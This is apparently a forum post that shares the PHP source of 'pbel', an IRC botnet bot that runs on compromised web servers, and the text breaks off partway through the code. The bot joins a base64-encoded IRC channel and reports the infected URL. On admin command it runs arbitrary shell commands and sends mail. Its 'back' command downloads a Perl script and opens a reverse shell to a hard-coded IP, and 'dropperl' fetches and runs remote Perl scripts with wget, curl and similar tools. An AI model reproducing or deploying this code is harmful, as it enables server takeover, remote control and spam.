PHP код:
<?
/****************************************************/
/* pbel - by s0 */
/* credits: the original author of pbot ( ? ) */
/****************************************************/
set_time_limit( 0 );
error_reporting( 0 );
echo "Success!";
class pBot
{
var $using_encode = true;
var $config = array(
'server' => 'aXJjLmFiamVjdHMubmV0', //server here (base64)
'port' => 7000,
'chan' => 'eG9ybmlsbA==', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"
'key' => 'bHVsejIzNA==',
'nickform' => '[SCAN][%d]',
'identp' => 'ez',
'modes' => '+p',
'maxrand' => 6,
'cprefix' => '.',
'host' => '3cae4b8e.4b89d8f.mk3.org'
);
var $admins = array
(
'Snipa' => '5376228093612d8d2f4d371f7de72a9e', // pass = "test"
'Baby_J' => '5376228093612d8d2f4d371f7de72a9e', // pass = "test"
'xEPx' => '5376228093612d8d2f4d371f7de72a9e', // pass = "test"
'iiLLuSiVe' => '5376228093612d8d2f4d371f7de72a9e', // pass = "test"
'Wako' => '5376228093612d8d2f4d371f7de72a9e', // pass = "test"
'[[[[[iiLLuSiVe]]]]]' => '5376228093612d8d2f4d371f7de72a9e' // pass = "test"
//passes are MD5 format, you can also have multiple admins
);
function auth_host( $nick, $password, $host )
{
$admin_count = count( $this->admins );
if( $admin_count > 0 )
{
$mpass = md5( $password );
if( $this->admins[ $nick ] == $mpass )
{
$this->users[ $host ] = true;
}
}
else
{
$this->users[ $host ] = true;
}
}
function is_authed( $host )
{
return isset( $this->users[ $host ] );
}
function remove_auth( $host )
{
unset( $this->users[ $host ] );
}
function ex( $cfe )
{
$res = '';
if (!empty($cfe))
{
if(function_exists('class_exists') && class_exists('Perl'))
{
$perl = new Perl();
$perl->eval( "system('$cfe');" );
}
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('proc_open'))
{
$res = proc_open($cfe);
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function is_safe( )
{
if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) )
{
return 0;
}
return 1;
}
function get_chan( )
{
if( $this->using_encode )
{
return '#'.base64_decode( $this->config[ 'chan' ] );
}
else
{
return '#'.$this->config[ 'chan' ];
}
}
function start()
{
if( $this->using_encode )
{
if(!($this->conn = fsockopen(base64_decode($this->config['server']),$this->config['port'],$e,$s,30)))
{
$this->start();
}
}
else
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
{
$this->start();
}
}
$ident = $this->config['prefix'];
$alph = range("0","9");
for( $i=0; $i < $this->config['maxrand']; $i++ )
{
$ident .= $alph[rand(0,9)];
}
if( strlen( $this->config[ 'pass' ] ) > 0 )
{
$this->send( "PASS ".$this->config[ 'pass' ] );
}
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick( );
$this->main( );
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
if( $this->using_encode )
{
$this->join($this->get_chan( ),base64_decode($this->config['key']));
$this->privmsg($this->get_chan( ),"Hostbooter v2 Online!");
$server_name = $_SERVER['SERVER_NAME'];
$req_uri = $_SERVER['REQUEST_URI'];
$vuln = "http://".$server_name.$req_uri;
$this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln );
}
else
{
$this->join($this->get_chan( ),$this->config['key']);
}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PART":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PRIVMSG":
if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) )
{
if( $this->is_authed( $host ) == false )
{
switch( substr( $mcmd[ 0 ], 1 ) )
{
case "login":
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
$this->privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] ".$nick." logged in!\3]");
$this->privmsg( $this->get_chan( ), exec('uptime'));
}
else
{
$this->privmsg( $this->get_chan( ), "[\3" . "4[\2Warning!\2] Incorrect Login from ".$nick."!\3]");
}
break;
}
}
}
else
{
switch(substr($mcmd[0],1))
{
case "exec":
{
if( !$this->is_safe( ) )
{
$command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$returndata = $this->ex( $command );
if( !empty( $returndata ) )
{
$this->privmsg( $this->get_chan( ), '[ exec ] '.$returndata );
}
}
break;
}
case "info":
{
$safemode = "on";
if( !$this->is_safe( ) )
{
$safemode = "off";
}
$this->privmsg( $this->get_chan( ), "\3" . "4.php_uname( ) (SAFE: .$safemode.)\3]");
break;
}
case "safe":
{
$safemode = "on";
if( !$this->is_safe( ) )
{
$safemode = "off";
}
$this->privmsg( $this->get_chan( ), "[\3" . "4Safe Mode is \2$safemode\2\3]");
break;
}
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header,$times))
{
$this->privmsg( $this->get_chan( ),"[\2MAIL\2]: Unable to send email.");
}
else
{
$this->privmsg( $this->get_chan( ),"[\2MAIL\2]: Sent emails to $times people\2".$mcmd[1]."\2");
}
break;
}
case "uname":
{
$this->privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) );
break;
}
case "back":
{
$this->privmsg( $this->get_chan( ), exec('cd /tmp;lwp-download http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/bc.txt;perl bc.txt 69.65.94.14 3071'));
$this->privmsg( $this->get_chan( ), "[\3" . "4Connecting to \2Snipa\2\3]");
}
case "dropperl":
{
if( $this->is_safe( ) )
{
$this->privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' );
break;
}
$perl_file = $mcmd[1];
if( !empty( $perl_file ) )
{
$parsed_url = $this->parse_url_s( $perl_file );
$new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ].$parsed_url[ 'dir' ].'/';
$new_local = $parsed_url[ 'file' ];
$file_type = $parsed_url[ 'file_ext' ];
$this->ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
03.12.2008, 00:56
pbel bot
